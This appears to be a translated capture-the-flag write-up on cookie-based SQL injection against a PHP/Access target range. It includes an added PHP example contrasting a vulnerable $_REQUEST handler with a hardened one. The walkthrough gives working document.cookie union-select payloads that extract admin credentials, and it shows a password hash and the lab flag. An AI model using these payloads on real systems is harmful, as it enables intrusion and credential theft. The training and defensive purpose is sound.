Access injection: cookie injection

Target range address

Principle: in PHP, $_REQUEST[] returns parameters from POST, GET and COOKIE alike, so you can use Burp to capture the request and modify the cookie, or use the browser console to set the cookie with JS for cookie injection.
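The following is an added example, not code from the original post or from the target range. It shows why the technique above works: a handler that reads `id` through $_REQUEST cannot tell whether the value came from the query string or from the Cookie header (which sources land in $_REQUEST is governed by the request_order ini setting, falling back to variables_order when request_order is empty), and if the value is concatenated into the SQL text, the cookie text becomes SQL. The hardened handler beside it reads only $_GET, requires a positive integer, and binds it as a parameter. The table name `admin` and column `username` are taken from the post; the SQLite setup, the function names and the sample request arrays are constructed for the demo.

```php
<?php
// Added example (not from the original post): $_REQUEST merging cookie values
// into a SQL string, beside a handler that reads one source and binds the value.
// Assumptions: table "admin" with columns "id" and "username" (from the post);
// the in-memory SQLite database and sample requests are constructed here.

declare(strict_types=1);

// Vulnerable pattern (kept deliberately to show the defect): the source of
// "id" is not fixed, so a Cookie value is accepted whenever request_order or
// variables_order includes "C", and it is pasted straight into the SQL text.
function buildVulnerableQuery(array $request): string
{
    $id = $request['id'] ?? '';
    return 'SELECT * FROM admin WHERE id=' . $id;
}

// Hardened pattern: read only the intended source ($_GET), require a positive
// integer, and bind it as a parameter so it can never alter the query structure.
function fetchAdminRowSafe(PDO $pdo, array $get): ?array
{
    $id = filter_var(
        $get['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return null; // missing, non-numeric, or "171 order by 10"-style values are rejected
    }
    $stmt = $pdo->prepare('SELECT id, username FROM admin WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- demo with constructed data ---------------------------------------------
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT)');
$pdo->exec("INSERT INTO admin (id, username) VALUES (171, 'admin')");

// A request with no id in the URL but an id carried in the cookie (constructed
// value shaped like the one the post sets with document.cookie).
$get    = [];
$cookie = ['id' => '171 order by 10'];
// With request_order "GPC" this is what $_REQUEST looks like: the handler
// cannot see that "id" came from the Cookie header.
$merged = array_merge($get, $cookie);

// The cookie text is now part of the SQL statement.
echo buildVulnerableQuery($merged), PHP_EOL;

// The hardened handler ignores the cookie entirely and rejects the non-integer
// value; only a well-formed query-string id reaches the database.
var_dump(fetchAdminRowSafe($pdo, $get));             // no id in the query string
var_dump(fetchAdminRowSafe($pdo, $cookie));          // cookie-shaped value fails validation
var_dump(fetchAdminRowSafe($pdo, ['id' => '171']));  // the row for id 171
```

Run with `php example.php` (requires the pdo_sqlite extension). The two checks a reviewer would look for in the hardened version are that the parameter source is explicit (no $_REQUEST) and that the value is both validated and bound; either one alone still leaves a gap.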

First question:

We enter the target range and click a link to reach a page that takes an id parameter.

First we try error-based injection through the GET parameter and find that it is forbidden, so we try cookie injection instead. Open Burp to capture the request, remove the id=171 from the URL, append a ; after the existing Cookie value, and then add id=171 to see whether the statement is executed. After forwarding the request, there is no id parameter in the URL, yet the page returns normally, which means the id we supplied in the cookie was executed. So we use JS in the console to determine the number of fields.

document.cookie="id="+escape("171 order by 1")

The page is normal, so we keep increasing the number, up to 11

document.cookie="id="+escape("171 order by 11")

Error, so we enter 10

document.cookie="id="+escape("171 order by 10")

The page is normal, so we determine that there are 10 fields and continue with the next JS statement

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

Because an Access database has only a single database name, you need to write from admin to find the output positions of the database, which are 2, 3, 7, 8 and 9. To determine the table name we could guess it manually, but brute-forcing with Burp is more suitable for novices, so we captured the packet and found many possible table names. In the era when Access databases were popular, however, the credentials were generally in the username and password fields of the admin table, so we entered directly

document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")

Find the account admin and continue typing

document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")

Find the password b9a2a2b5dffb918c and log in to the backend, but the password is wrong

Decrypt the password's MD5 hash and log in to get the flag: zkz{welcome-control}


Origin blog.csdn.net/weixin_43264067/article/details/106050363